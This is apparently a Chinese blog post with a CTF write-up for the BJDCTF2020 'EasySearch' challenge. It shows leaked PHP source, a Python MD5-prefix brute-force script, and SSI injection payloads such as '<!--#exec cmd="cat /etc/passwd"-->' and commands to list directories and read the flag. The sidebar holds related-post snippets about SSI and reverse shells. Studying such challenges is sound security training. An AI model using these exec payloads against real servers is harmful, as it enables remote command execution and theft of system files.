代码审计后的SSI注入漏洞

最新推荐文章于 2024-06-26 17:30:04 发布
最新推荐文章于 2024-06-26 17:30:04 发布
阅读量3.1k 收藏
点赞数 1
文章标签: 安全 wireshark udp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53142368/article/details/121429562
版权

[BJDCTF2020]EasySearch

首先就是dirsearch扫描,用dirsearch的前提一定是前端看不到啥东西了,呢就不用猜,绝对有一些隐藏文件。
然后dirsearch就扫描出来了index;php.swp文件。。。
然后就看到了源码 进行代码审计

[<?php
	ob_start();
	function get_hash(){
		$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';
		$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times
		$content = uniqid().$random;
		return sha1($content); 
	}
    header("Content-Type: text/html;charset=utf-8");
	***
    if(isset($_POST['username']) and $_POST['username'] != '' )
    {
        $admin = '6d0bc1';
        if ( $admin == substr(md5($_POST['password']),0,6)) {
            echo "<script>alert('[+] Welcome to manage system')</script>";
            $file_shtml = "public/".get_hash().".shtml";
            $shtml = fopen($file_shtml, "w") or die("Unable to open file!");
            $text = '
            ***
            ***
            <h1>Hello,'.$_POST['username'].'</h1>
            ***
			***';
            fwrite($shtml,$text);
            fclose($shtml);
            ***
			echo "[!] Header  error ...";
        } else {
            echo "<script>alert('[!] Failed')</script>";
            
    }else
    {
	***
    }
	***
?>

代码审计 就是bcusername可以随便写 ,但是 password的前六位必须要md5加密是6d0bc1
python爆破 脚本如下:

import hashlib

for i in range(1000000000):
    a = hashlib.md5(str(i).encode('utf-8')).hexdigest()
    if a[0:6] == '6d0bc1':
        print(i,a)

运行结果

2020666 6d0bc1153791aa2b4e18b4f344f26ab4
2305004 6d0bc1ec71a9b814677b85e3ac9c3d40
9162671 6d0bc11ea877b37d694b38ba8a45b19c

然后进行登录
登录之后,前端认真找找
在这里插入图片描述
发现一个url here

知识点:SSI注入漏洞
SSI 注入全称Server-Side Includes Injection,即服务端包含注入。SSI 是类似于 CGI,用于动态页面的指令。SSI 注入允许远程在 Web 应用中注入脚本来执行代码。

SSI是嵌入HTML页面中的指令,在页面被提供时由服务器进行运算,以对现有HTML页面增加动态生成的内容,而无须通过CGI程序提供其整个页面,或者使用其他动态技术。

从技术角度上来说,SSI就是在HTML文件中,可以通过注释行调用的命令或指针,即允许通过在HTML页面注入脚本或远程执行任意代码。

显示服务器端环境变量<#echo>
本文档名称:

<!–#echo var="DOCUMENT_NAME"–>

现在时间:

<!–#echo var="DATE_LOCAL"–>

显示IP地址:

<! #echo var="REMOTE_ADDR"–>

将文本内容直接插入到文档中<#include>

<! #include file="文件名称"–>

<!--#include virtual="index.html" -->

<! #include virtual="文件名称"–>

<!--#include virtual="/www/footer.html" -->

注:file包含文件可以在同一级目录或其子目录中,但不能在上一级目录中,virtual包含文件可以是Web站点上的虚拟目录的完整路径

显示WEB文档相关信息<#flastmod><#fsize>(如文件制作日期/大小等)
文件最近更新日期:

<! #flastmod file="文件名称"–>

文件的长度:

<!–#fsize file="文件名称"–>

④直接执行服务器上的各种程序<#exec>(如CGI或其他可执行程序)

<!–#exec cmd="文件名称"–>

<!--#exec cmd="cat /etc/passwd"-->

<!–#exec cgi="文件名称"–>

<!--#exec cgi="/cgi-bin/access_log.cgi"–>

将某一外部程序的输出插入到页面中。可插入CGI程序或者是常规应用程序的输入,这取决于使用的参数是cmd还是cgi。

(SSI注入的条件:
1.Web 服务器已支持SSI(服务器端包含)

2.Web 应用程序未对对相关SSI关键字做过滤

3.Web 应用程序在返回响应的HTML页面时,嵌入用户输入)

利用SSI注入漏洞,我们可以在username变量中传入ssi语句来远程执行系统命令。

看一下当前目录的文件<!--#exec cmd="ls"-->

回归本题
在这里插入图片描述
通过

<!--#exec cmd="ls"-->

命令查看回显
在这里插入图片描述
看到ls的文件目录
在这里插入图片描述
看上一级目录

<!--#exec cmd="ls ../"-->

在这里插入图片描述
在这里插入图片描述
最后的命令查看flag

<!--#exec cmd="cat ../flag_990c66bf85a09c664f0b6741840499b2"-->

好了好了 累死了 晚上轮滑去
妈咦 溜了 你们自学把

H0ne
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SSI.zip_SSI_SSI Injection代码
09-22
**SSI注入漏洞** SSI注入,即SSI Injection,是指攻击者通过输入恶意的SSI指令到应用程序中,来利用服务器的SSI功能,获取敏感信息或执行非法操作。这种漏洞常见于用户可控的数据被直接插入到包含SSI指令的页面中,...
SSI漏洞注入
weixin_45007073的博客
01-04 930
在进行SSI漏洞注入之前,先介绍一下什么是SSI漏洞SSI 注入全称Server-Side Includes Injection,即服务端包含注入SSI 是类似于 CGI,用于动态页面的指令。SSI 注入允许远程在 Web 应用中注入脚本来执行代码。 准备工作 靶机地址: 链接:https://pan.baidu.com/s/1MTunDny-m5eICXAS9P8ugA 提取码:x3c2 漏洞复现过程 使用netdiscover发现存活主机 netdidscover -i eth0 使用n
SSI 注入漏洞
最新发布
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
06-26 503
通过信息收集技术,了解我们的检测目标运行哪些类型的 Web 服务器,查看检测网站的内容来猜测是否支持 SSI,由于 .shtml 文件后缀名是用来表明网页文件是否包含 SSI 指令的,因此如果该网站使用了 .shtml 文件,那说明该网站支持 SSI 指令。在很多场景中,用户输入的内容可以显示在页面中,比如一个存在反射 XSS 漏洞的页面,如果输入的 payload 不是 XSS 代码而是 SSI 标签,服务器又开启了 SSI 支持的话就会存在 SSI 漏洞SSI 具有强大的功能,只要使用一条简单的。
SSI注入漏洞
Hydra的博客
11-19 9466
SSI 注入全称Server-Side Includes Injection,即服务端包含注入SSI 是类似于 CGI,用于动态页面的指令。SSI 注入允许远程在 Web 应用中注入脚本来执行代码。 SSI是嵌入HTML页面中的指令,在页面被提供时由服务器进行运算,以对现有HTML页面增加动态生成的内容,而无须通过CGI程序提供其整个页面,或者使用其他动态技术。 从技术角度上来说,SSI就是...
Apache SSI 远程命令执行漏洞
m0_52701599的博客
02-19 840
Apache SSI 远程命令执行漏洞
CTF之Web安全SSI注入
小王的储物间
03-29 389
SSI(server side inject)的出现是为了赋予HTML静态页面动态的效果,通过SSI来执行系统命令;并返回对应的结果。如果再网站目录中发现了.stm;.shtm;.shtml;这样的文件后缀名,并且网站对于SSI的输入没有做到严格过滤或者过滤不充分;很有可能被SSI注入攻击。对于SSI漏洞服务器有很多过滤机制,需要进行绕过,比如大小写。防御措施:一、进行过滤,过滤这些语法中的特殊字符二、关闭服务器SSI相关功能。
SSI框架代码样例
04-14
标题 "SSI框架代码样例" 暗示我们即将探讨的是一个使用SSI(Server Side Includes)框架构建的项目。SSI是一种简单的服务器端脚本语言,主要用于在HTML文档中嵌入动态内容,比如时间戳、服务器变量等。在这个项目中...
ssi框架源代码
12-05
文件"SSI_Login"可能是SSI框架中的登录模块源代码,通常包括用户认证、权限验证等功能。在Struts2框架下,它可能会有一个对应的Action类来处理用户的登录请求,同时利用Spring的依赖注入来获取需要的服务,如用户...
ssi自动生成底层代码(纯手写)
08-25
请仔细阅读此说明:自动生成action、service、... 只需要将相应的代码粘贴到相应的位置即可。使用方法:打开工程,在createfile.java 类里填写数据表名以及生成盘符名。在conn.java类中维护好连接语句。即可自动生成。
SSI.rar 代码库
10-17
这个"SSI.rar 代码库"看起来是一个包含了与SSI相关的代码和示例的压缩包,适合初学者用来练习和了解SSI的工作原理。 SSI的主要功能包括: 1. **文件包含**:使用`<!--#include virtual="filename"-->`或`<!--#...
SSI注入实战
qq_23347209的博客
05-28 1259
文章目录靶机环境一、服务器信息搜集二、网站信息搜集1.使用nikto扫描网站目录2.浏览网站三、SSI注入漏洞利用1、SSI注入简介:2、SSI注入测试网站四、利用nc反弹shell——失败五、使用msf框架1、python木马生成2、建立木马监听端3、上传木马文件到本地web服务器上4、构造SSI注入语句执行木马 靶机环境 靶机下载网站:https://www.vulnhub.com/ 使用Vmware虚拟机中NAT网络 靶机 192.168.146.150 攻击机 parrot 192.168.14
CTF-12.web安全SSI注入
woo233的博客
09-20 748
SSl(server side inject)的出现是为了赋予html静态页面动态的效果,通过ssI来执行系统命令,并返回对应的结果。如果在网站目录中发现了.stm, .shtm .shtml,并且网站对于SSI的输入没有做到严格过滤,很有可能被SSl注入攻击。实验环境攻击机: kali 192.168.1.103靶场机器: linux 192.168.1.106在ctf比赛中,对于ssi漏洞服务器具有很多过滤机制,我们需要对其进行绕过,比如大小写;
SSTI服务器模板注入原理&攻击手法&绕过手法&防御手段
qq_56815564的博客
07-31 1152
时间一晃,又是好久没有发过文章了,最近再准备面试了,当你真正去准备的时候你才会发现自己原来什么都还只是个半吊子,哎难顶正好看到一道面试题,说是说一下python有关的漏洞,这边因为对php的漏洞熟悉一点,所以这方面我发现我是真的什么都不知道,于是上网去找了很久,再学习的过程中顺便总结了这篇文章吧🙏。
[BJDCTF2020]EasySearch
m0_62092622的博客
04-24 742
先扫描目录,发现.swp备份文件源码泄露(以后题目查询的文件又增加了一个) http://8cfe7f8c-22b7-43e1-8b5c-a71c5c0858d8.node4.buuoj.cn:81/index.php.swp 然后得到源码 <?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&amp..
SSI注入
发哥微课堂
06-28 930
0x00:介绍 SSI 是 Server Side Includes 的缩写,即服务端包含。我们都知道像后台语言 php、asp 等都有文件包含的函数 include,包含一些公共的函数库等。那么 html 也有这种包含的机制,我们可以把它叫做 SSISSI 还有一些使用情况例如,页面需要动态加入一些内容,这些内容常见的比如自己的 ip 地址,自己的位置信息等。SSI 默认的文件类型是 sht...
ssi协议代码
05-24
SSI (Server Side Includes, 服务器端包含)是一种在HTML页面中嵌入动态内容的技术。它通过在HTML中插入特殊指令来实现,这些指令由Web服务器解析并替换为动态内容。 以下是一个简单的SSI代码示例: ```html <!DOCTYPE html> <html> <head> <title>SSI Example</title> </head> <body> <h1>Welcome to my page!</h1> <!--#echo var="DATE_LOCAL" --> <p>This page was last updated on <!--#echo var="LAST_MODIFIED" --></p> </body> </html> ``` 在上面的代码中,`<!--#`和`-->`之间的内容是SSI指令。第一个指令`#echo var="DATE_LOCAL"`会被解析为当前的本地日期和时间。第二个指令`#echo var="LAST_MODIFIED"`会被解析为页面的最后修改时间。 要使用SSI,您需要在Web服务器上启用SSI功能,并将HTML文件的扩展名更改为`.shtml`或`.shtm`。然后,您可以在HTML页面中使用SSI指令来包含动态内容。 请注意,SSI已被认为是过时技术,现在很少使用。在现代Web开发中,通常使用PHP、Node.js等服务器端脚本语言来生成动态内容。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值